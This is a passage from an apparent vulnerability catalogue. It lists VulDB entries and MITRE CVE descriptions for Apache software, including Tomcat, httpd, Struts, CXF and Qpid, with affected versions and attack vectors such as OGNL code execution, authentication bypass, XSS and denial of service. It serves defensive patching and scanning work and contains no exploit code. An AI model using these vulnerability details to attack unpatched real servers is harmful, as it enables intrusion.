5493| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
5494| [37292] Apache Tomcat up to 5.5.1 cross site scripting
5495| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
5496| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
5497| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
5498| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
5499| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
5500| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
5501| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
5502| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
5503| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
5504| [36225] XAMPP Apache Distribution 1.6.0a sql injection
5505| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
5506| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
5507| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
5508| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
5509| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
5510| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
5511| [34252] Apache HTTP Server denial of service
5512| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
5513| [33877] Apache Opentaps 0.9.3 cross site scripting
5514| [33876] Apache Open For Business Project unknown vulnerability
5515| [33875] Apache Open For Business Project cross site scripting
5516| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid() memory corruption
5517| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
5518| [31827] XMB Extreme Message Board up to 1.9.6 Apache HTTP Server memcp.php directory traversal
5519| [2452] Apache HTTP Server up to 2.2.3 on Windows mod_alias unknown vulnerability
5520| [31663] vbPortal Apache HTTP Server index.php directory traversal
5521| [2414] Apache HTTP Server up to 2.2.3 mod_rewrite memory corruption
5522| [2393] Apache HTTP Server up to 2.2.2 HTTP Header cross site scripting
5523| [30623] Apache James 2.2.0 SMTP Server denial of service
5524| [30176] PHP-Fusion up to 6.00.306 Apache HTTP Server .php.gif privilege escalation
5525|
5526| MITRE CVE - https://cve.mitre.org:
5527| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
5528| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
5529| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
5530| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
5531| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
5532| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
5533| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
5534| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
5535| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
5536| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
5537| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
5538| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
5539| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
5540| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
5541| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
5542| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
5543| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
5544| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
5545| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
